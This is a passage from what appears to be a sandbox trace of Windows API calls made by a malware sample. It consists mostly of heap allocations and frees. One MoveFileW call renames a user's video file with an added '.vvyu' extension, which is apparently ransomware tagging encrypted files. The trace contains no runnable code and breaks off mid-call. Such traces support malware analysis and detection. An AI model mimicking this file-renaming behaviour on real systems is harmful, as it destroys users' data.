lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0202.635] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0202.635] CloseHandle (hObject=0x510) returned 1 [0202.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0202.638] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x2ea6a68 [0202.638] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0202.638] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\Tb8PI4n8ykiF82PGQ8M.mkv" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\tb8pi4n8ykif82pgq8m.mkv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\z2E0zT\\vtiS4AAZ_oK\\Tb8PI4n8ykiF82PGQ8M.mkv.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\z2e0zt\\vtis4aaz_ok\\tb8pi4n8ykif82pgq8m.mkv.vvyu")) returned 1 [0202.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0202.640] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0202.641] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0202.644] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0202.644] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5693d200, ftCreationTime.dwHighDateTime=0x1d89993, ftLastAccessTime.dwLowDateTime=0x770b34e0, ftLastAccessTime.dwHighDateTime=0x1d89e13, ftLastWriteTime.dwLowDateTime=0x770b34e0, ftLastWriteTime.dwHighDateTime=0x1d89e13, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_qbp0nkGuotBuAqg", cAlternateFileName="_QBP0N~1")) returned 1 [0202.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0202.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c278 [0202.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa8) returned 0x2c6ead8 [0202.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c388 [0202.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e91678 [0202.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa0) returned 0x2c2f930 [0202.644] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7cd50 [0202.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c0e0 | out: hHeap=0x620000) returned 1 [0202.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0202.645] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c63720 | out: hHeap=0x620000) returned 1 [0202.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a80 | out: hHeap=0x620000) returned 1 [0202.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0202.646] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c0e0 [0202.646] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c278 | out: hHeap=0x620000) returned 1 [0202.647] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0202.647] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5693d200, ftCreationTime.dwHighDateTime=0x1d89993, ftLastAccessTime.dwLowDateTime=0x770b34e0, ftLastAccessTime.dwHighDateTime=0x1d89e13, ftLastWriteTime.dwLowDateTime=0x770b34e0, ftLastWriteTime.dwHighDateTime=0x1d89e13, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_qbp0nkGuotBuAqg", cAlternateFileName="_QBP0N~1")) returned 0 [0202.647] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0202.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0202.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0202.648] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0202.648] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0202.649] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0202.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.649] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.649] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.650] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.651] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.652] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.653] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0202.653] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.654] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.655] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.655] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.656] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.656] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.657] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.658] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.658] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.659] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.660] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.660] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.661] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.662] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.662] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.663] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.663] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.664] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.664] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.665] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.665] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.666] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.667] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.667] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.668] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0202.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.668] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.669] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.669] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.671] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.673] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.675] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.676] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.677] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.678] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.679] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.679] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.680] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.680] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.682] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.683] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.683] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.684] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.684] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0202.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.685] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.686] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0202.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0202.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e8e298 [0202.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.688] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0202.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0202.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0202.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0202.689] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0202.689] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 